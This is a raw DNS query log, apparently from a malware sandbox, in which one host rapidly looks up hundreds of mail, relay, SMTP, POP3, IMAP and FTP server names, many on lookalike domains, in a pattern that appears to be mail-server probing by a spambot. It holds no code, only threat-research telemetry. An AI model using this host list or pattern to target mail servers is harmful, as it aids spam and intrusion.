Feb 21, 2024 00:26:16.123511076 CET	1.1.1.1	192.168.2.6	0x6128	Name error (3)	pop3.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.141320944 CET	1.1.1.1	192.168.2.6	0x55a0	Name error (3)	imap.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.208131075 CET	1.1.1.1	192.168.2.6	0xc8a9	Name error (3)	mail.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.235785007 CET	1.1.1.1	192.168.2.6	0x6409	Name error (3)	mail.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.262980938 CET	1.1.1.1	192.168.2.6	0xfce8	Name error (3)	mail.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.334656000 CET	1.1.1.1	192.168.2.6	0x9123	Name error (3)	mailgate.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.337641954 CET	1.1.1.1	192.168.2.6	0x7036	Name error (3)	mailgate.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.368959904 CET	1.1.1.1	192.168.2.6	0x36bd	Name error (3)	mailgate.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.379555941 CET	1.1.1.1	192.168.2.6	0xd414	Name error (3)	mailgate.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.401681900 CET	1.1.1.1	192.168.2.6	0xa0d5	Name error (3)	mailgate.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.409564018 CET	1.1.1.1	192.168.2.6	0x698f	Name error (3)	mail.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.409770012 CET	1.1.1.1	192.168.2.6	0x5b39	Name error (3)	pop3.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.419403076 CET	1.1.1.1	192.168.2.6	0x6721	Name error (3)	mailgate.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.448049068 CET	1.1.1.1	192.168.2.6	0xe0d3	Name error (3)	pop3.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.455773115 CET	1.1.1.1	192.168.2.6	0x236e	Name error (3)	mailgate.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.467621088 CET	1.1.1.1	192.168.2.6	0x8020	Name error (3)	relay.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.469420910 CET	1.1.1.1	192.168.2.6	0x7b2a	Server failure (2)	pop3.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.474303007 CET	1.1.1.1	192.168.2.6	0x30a8	Name error (3)	imap.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.483465910 CET	1.1.1.1	192.168.2.6	0x998a	Name error (3)	pop3.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.521234989 CET	1.1.1.1	192.168.2.6	0xf2da	Name error (3)	mailgate.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.522145987 CET	1.1.1.1	192.168.2.6	0xf01b	Name error (3)	mailgate.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.542593956 CET	1.1.1.1	192.168.2.6	0x313	Name error (3)	mailgate.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.548346043 CET	1.1.1.1	192.168.2.6	0x6240	Name error (3)	mailgate.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.564969063 CET	1.1.1.1	192.168.2.6	0x335e	Name error (3)	pop.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.591296911 CET	1.1.1.1	192.168.2.6	0x14bd	Name error (3)	mailgate.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.611560106 CET	1.1.1.1	192.168.2.6	0x373b	Name error (3)	mailgate.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.624739885 CET	1.1.1.1	192.168.2.6	0x895d	Name error (3)	mailgate.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.624754906 CET	1.1.1.1	192.168.2.6	0xd0ad	Name error (3)	mailgate.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.635617018 CET	1.1.1.1	192.168.2.6	0x6429	Name error (3)	mailgate.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.704924107 CET	1.1.1.1	192.168.2.6	0x2420	Name error (3)	mailgate.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.757738113 CET	1.1.1.1	192.168.2.6	0x32d9	Name error (3)	mailgate.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.792953968 CET	1.1.1.1	192.168.2.6	0x31ac	Name error (3)	mailgate.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.807279110 CET	1.1.1.1	192.168.2.6	0xb86a	Name error (3)	mailgate.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.817313910 CET	1.1.1.1	192.168.2.6	0x9c70	No error (0)	www.creativ-moebelwerkstaetten.de	creativ-moebelwerkstaetten.de		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:16.817313910 CET	1.1.1.1	192.168.2.6	0x9c70	No error (0)	creativ-moebelwerkstaetten.de		81.169.145.86	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.833380938 CET	1.1.1.1	192.168.2.6	0x881a	Name error (3)	mailgate.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.836111069 CET	1.1.1.1	192.168.2.6	0x70	Name error (3)	mailgate.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.837028980 CET	1.1.1.1	192.168.2.6	0xaf6f	Name error (3)	imap.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.851383924 CET	1.1.1.1	192.168.2.6	0xe96e	Name error (3)	mailgate.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.877439022 CET	1.1.1.1	192.168.2.6	0x50b	Name error (3)	mailgate.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.943975925 CET	1.1.1.1	192.168.2.6	0xc1cd	Name error (3)	mailgate.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.981357098 CET	1.1.1.1	192.168.2.6	0xb15f	Name error (3)	mailgate.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.067982912 CET	1.1.1.1	192.168.2.6	0xb3b0	Name error (3)	mail.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.070450068 CET	1.1.1.1	192.168.2.6	0x26d3	Name error (3)	mailgate.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.070946932 CET	1.1.1.1	192.168.2.6	0x439	Name error (3)	mail.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.075478077 CET	1.1.1.1	192.168.2.6	0xcbe5	Name error (3)	mailgate.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.154645920 CET	1.1.1.1	192.168.2.6	0xd849	Name error (3)	mailgate.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.155189991 CET	1.1.1.1	192.168.2.6	0xf55c	Name error (3)	mailgate.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.159002066 CET	1.1.1.1	192.168.2.6	0xeb73	Name error (3)	mailgate.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.159564972 CET	1.1.1.1	192.168.2.6	0xb3df	Name error (3)	relay.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.173927069 CET	1.1.1.1	192.168.2.6	0x456c	Name error (3)	mailgate.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.245253086 CET	1.1.1.1	192.168.2.6	0xdf96	Server failure (2)	mailgate.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.350069046 CET	1.1.1.1	192.168.2.6	0xd41e	Name error (3)	mailgate.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.392637968 CET	1.1.1.1	192.168.2.6	0xb9c0	Name error (3)	mailgate.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.394496918 CET	1.1.1.1	192.168.2.6	0x53c0	Name error (3)	mailgate.sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.396095991 CET	1.1.1.1	192.168.2.6	0xf327	Name error (3)	mailgate.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.429866076 CET	1.1.1.1	192.168.2.6	0x4397	Name error (3)	mailgate.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.458508968 CET	1.1.1.1	192.168.2.6	0x663f	Name error (3)	relay.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.461025000 CET	1.1.1.1	192.168.2.6	0xd12	Name error (3)	relay.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.517007113 CET	1.1.1.1	192.168.2.6	0x3b48	Name error (3)	relay.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.527813911 CET	1.1.1.1	192.168.2.6	0x40a6	Name error (3)	relay.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.533123016 CET	1.1.1.1	192.168.2.6	0xb64b	Name error (3)	relay.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.555099010 CET	1.1.1.1	192.168.2.6	0xe012	Name error (3)	relay.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.593830109 CET	1.1.1.1	192.168.2.6	0xc2ef	Name error (3)	relay.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.595782995 CET	1.1.1.1	192.168.2.6	0xbfd	Name error (3)	relay.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.602494001 CET	1.1.1.1	192.168.2.6	0xf5d3	Name error (3)	relay.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.604077101 CET	1.1.1.1	192.168.2.6	0x6ba8	Name error (3)	relay.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.605415106 CET	1.1.1.1	192.168.2.6	0x1cec	Name error (3)	relay.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.606836081 CET	1.1.1.1	192.168.2.6	0xc60b	Name error (3)	relay.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.613568068 CET	1.1.1.1	192.168.2.6	0xf99e	Name error (3)	mailgate.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.627747059 CET	1.1.1.1	192.168.2.6	0xa215	Name error (3)	relay.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.628911018 CET	1.1.1.1	192.168.2.6	0x552c	Name error (3)	relay.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.633466005 CET	1.1.1.1	192.168.2.6	0x9d56	Name error (3)	relay.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.643889904 CET	1.1.1.1	192.168.2.6	0x76f1	Name error (3)	relay.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.649288893 CET	1.1.1.1	192.168.2.6	0x3a01	Name error (3)	relay.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.668168068 CET	1.1.1.1	192.168.2.6	0x2fde	Name error (3)	relay.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.681962967 CET	1.1.1.1	192.168.2.6	0x818f	Name error (3)	mailgate.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.690030098 CET	1.1.1.1	192.168.2.6	0x930f	Name error (3)	smtp.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.717453957 CET	1.1.1.1	192.168.2.6	0x9226	Name error (3)	relay.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.730628014 CET	1.1.1.1	192.168.2.6	0x9057	Name error (3)	smtp.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.765933990 CET	1.1.1.1	192.168.2.6	0xac8f	Name error (3)	relay.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.772253036 CET	1.1.1.1	192.168.2.6	0xf57e	Name error (3)	smtp.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.791110039 CET	1.1.1.1	192.168.2.6	0xd168	Name error (3)	relay.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.798000097 CET	1.1.1.1	192.168.2.6	0x1d43	Name error (3)	smtp.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.800622940 CET	1.1.1.1	192.168.2.6	0x9834	Name error (3)	mailgate.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.800750971 CET	1.1.1.1	192.168.2.6	0xf3c8	Name error (3)	pop3.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.803637028 CET	1.1.1.1	192.168.2.6	0x9dcc	Name error (3)	relay.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.804369926 CET	1.1.1.1	192.168.2.6	0x854c	Name error (3)	smtp.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.814980030 CET	1.1.1.1	192.168.2.6	0xc5c	Name error (3)	relay.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.858000040 CET	1.1.1.1	192.168.2.6	0x1dca	Name error (3)	smtp.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.937835932 CET	1.1.1.1	192.168.2.6	0x90cb	Name error (3)	relay.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.938210964 CET	1.1.1.1	192.168.2.6	0x76f0	Name error (3)	relay.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.986989975 CET	1.1.1.1	192.168.2.6	0x1d23	Name error (3)	relay.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.072654009 CET	1.1.1.1	192.168.2.6	0xd22f	Name error (3)	relay.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.088685989 CET	1.1.1.1	192.168.2.6	0x21be	Name error (3)	relay.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.128037930 CET	1.1.1.1	192.168.2.6	0x57c6	Name error (3)	smtp.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.167373896 CET	1.1.1.1	192.168.2.6	0x7103	Name error (3)	smtp.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.197815895 CET	1.1.1.1	192.168.2.6	0x7c75	Name error (3)	relay.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.206696033 CET	1.1.1.1	192.168.2.6	0x5ee	Name error (3)	relay.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.254406929 CET	1.1.1.1	192.168.2.6	0x725	Name error (3)	smtp.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.273827076 CET	1.1.1.1	192.168.2.6	0x291f	Name error (3)	smtp.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.282278061 CET	1.1.1.1	192.168.2.6	0xd331	Name error (3)	smtp.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.292788029 CET	1.1.1.1	192.168.2.6	0xbf1b	Name error (3)	smtp.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.336978912 CET	1.1.1.1	192.168.2.6	0x5de2	Name error (3)	relay.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.338260889 CET	1.1.1.1	192.168.2.6	0xc728	Name error (3)	relay.sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.338833094 CET	1.1.1.1	192.168.2.6	0x9134	Name error (3)	smtp.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.397695065 CET	1.1.1.1	192.168.2.6	0xf08a	Name error (3)	relay.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.437757015 CET	1.1.1.1	192.168.2.6	0xe9aa	Name error (3)	mailgate.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.442610025 CET	1.1.1.1	192.168.2.6	0xf1f8	Name error (3)	smtp.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.486994982 CET	1.1.1.1	192.168.2.6	0xc637	Name error (3)	relay.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.521256924 CET	1.1.1.1	192.168.2.6	0x8bbd	Name error (3)	smtp.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.532515049 CET	1.1.1.1	192.168.2.6	0x67f5	Name error (3)	smtp.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.538027048 CET	1.1.1.1	192.168.2.6	0x400a	Name error (3)	smtp.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.591048956 CET	1.1.1.1	192.168.2.6	0x434e	Name error (3)	relay.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.599829912 CET	1.1.1.1	192.168.2.6	0xc719	Name error (3)	smtp.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.607753992 CET	1.1.1.1	192.168.2.6	0x7752	Name error (3)	relay.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.617531061 CET	1.1.1.1	192.168.2.6	0xf36f	Name error (3)	smtp.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.617928028 CET	1.1.1.1	192.168.2.6	0xae04	Name error (3)	smtp.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.652647018 CET	1.1.1.1	192.168.2.6	0xf120	Name error (3)	relay.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.661200047 CET	1.1.1.1	192.168.2.6	0x9ea9	Server failure (2)	relay.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.680141926 CET	1.1.1.1	192.168.2.6	0x1b43	Name error (3)	smtp.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.688286066 CET	1.1.1.1	192.168.2.6	0x80ed	Name error (3)	relay.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.698734999 CET	1.1.1.1	192.168.2.6	0xfdbf	Name error (3)	smtp.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.755714893 CET	1.1.1.1	192.168.2.6	0xf81c	Name error (3)	smtp.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.759073019 CET	1.1.1.1	192.168.2.6	0xde04	Name error (3)	smtp.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.791769028 CET	1.1.1.1	192.168.2.6	0xf44a	Name error (3)	smtp.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.826031923 CET	1.1.1.1	192.168.2.6	0xd9c1	Name error (3)	smtp.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.848092079 CET	1.1.1.1	192.168.2.6	0xff41	Name error (3)	smtp.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.906579018 CET	1.1.1.1	192.168.2.6	0x987c	Name error (3)	smtp.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.930994034 CET	1.1.1.1	192.168.2.6	0x1e43	Server failure (2)	mail.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.931054115 CET	1.1.1.1	192.168.2.6	0x1e43	Server failure (2)	mail.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.931085110 CET	1.1.1.1	192.168.2.6	0x1e43	Server failure (2)	mail.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.957587957 CET	1.1.1.1	192.168.2.6	0xa231	Name error (3)	smtp.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.016496897 CET	1.1.1.1	192.168.2.6	0x4a69	Name error (3)	smtp.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.047652960 CET	1.1.1.1	192.168.2.6	0xc248	Name error (3)	smtp.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.074836969 CET	1.1.1.1	192.168.2.6	0x7e2b	No error (0)	ftp.b4l-clan.de		127.0.0.1	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.078603983 CET	1.1.1.1	192.168.2.6	0x5254	Name error (3)	smtp.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.083358049 CET	1.1.1.1	192.168.2.6	0xc094	Name error (3)	smtp.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.093274117 CET	1.1.1.1	192.168.2.6	0xa5c9	Name error (3)	smtp.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.146426916 CET	1.1.1.1	192.168.2.6	0xd334	Name error (3)	smtp.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.147537947 CET	1.1.1.1	192.168.2.6	0xf4a4	Name error (3)	smtp.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.147764921 CET	1.1.1.1	192.168.2.6	0xf0a2	Name error (3)	smtp.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.155136108 CET	1.1.1.1	192.168.2.6	0x6716	Name error (3)	smtp.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.163225889 CET	1.1.1.1	192.168.2.6	0xa9af	Name error (3)	smtp.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.166512966 CET	1.1.1.1	192.168.2.6	0x2813	Name error (3)	smtp.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.167653084 CET	1.1.1.1	192.168.2.6	0x1937	Name error (3)	smtp.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.167805910 CET	1.1.1.1	192.168.2.6	0x8e49	No error (0)	ftp.imailzone.com	pltraffic33.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:19.167805910 CET	1.1.1.1	192.168.2.6	0x8e49	No error (0)	pltraffic33.com		72.52.178.23	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.201628923 CET	1.1.1.1	192.168.2.6	0x6f57	Name error (3)	relay.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.297003031 CET	1.1.1.1	192.168.2.6	0x4dcb	Server failure (2)	smtp.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.307226896 CET	1.1.1.1	192.168.2.6	0x37c0	Name error (3)	smtp.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.309233904 CET	1.1.1.1	192.168.2.6	0x79ae	Name error (3)	relay.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.352063894 CET	1.1.1.1	192.168.2.6	0x305f	Name error (3)	relay.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.528265953 CET	1.1.1.1	192.168.2.6	0xafed	Name error (3)	mail.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.528358936 CET	1.1.1.1	192.168.2.6	0xafed	Name error (3)	mail.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.596966028 CET	1.1.1.1	192.168.2.6	0x406	Name error (3)	mail.joaz.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.718633890 CET	1.1.1.1	192.168.2.6	0xedeb	No error (0)	voltagedistribution-com01i.mail.protection.outlook.com		104.47.24.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.718633890 CET	1.1.1.1	192.168.2.6	0xedeb	No error (0)	voltagedistribution-com01i.mail.protection.outlook.com		104.47.25.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.766459942 CET	1.1.1.1	192.168.2.6	0xb165	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.766459942 CET	1.1.1.1	192.168.2.6	0xb165	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		52.101.8.34	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.766459942 CET	1.1.1.1	192.168.2.6	0xb165	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		52.101.40.0	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.766459942 CET	1.1.1.1	192.168.2.6	0xb165	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		52.101.42.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.766459942 CET	1.1.1.1	192.168.2.6	0xb165	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.766459942 CET	1.1.1.1	192.168.2.6	0xb165	No error (0)	waukeshawater-com02b.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.779438019 CET	1.1.1.1	192.168.2.6	0x27a	No error (0)	ftp.hotmail.fr.au		103.224.182.253	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.860007048 CET	1.1.1.1	192.168.2.6	0x7bcb	Name error (3)	relay.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.920057058 CET	1.1.1.1	192.168.2.6	0xe9a7	No error (0)	mx2.ovh.net		87.98.132.45	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.980757952 CET	1.1.1.1	192.168.2.6	0x6fd4	Name error (3)	ftp.archononline.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.980766058 CET	1.1.1.1	192.168.2.6	0x6fd4	Name error (3)	ftp.archononline.com	none	none	A (IP address)	IN (0x0001)	false
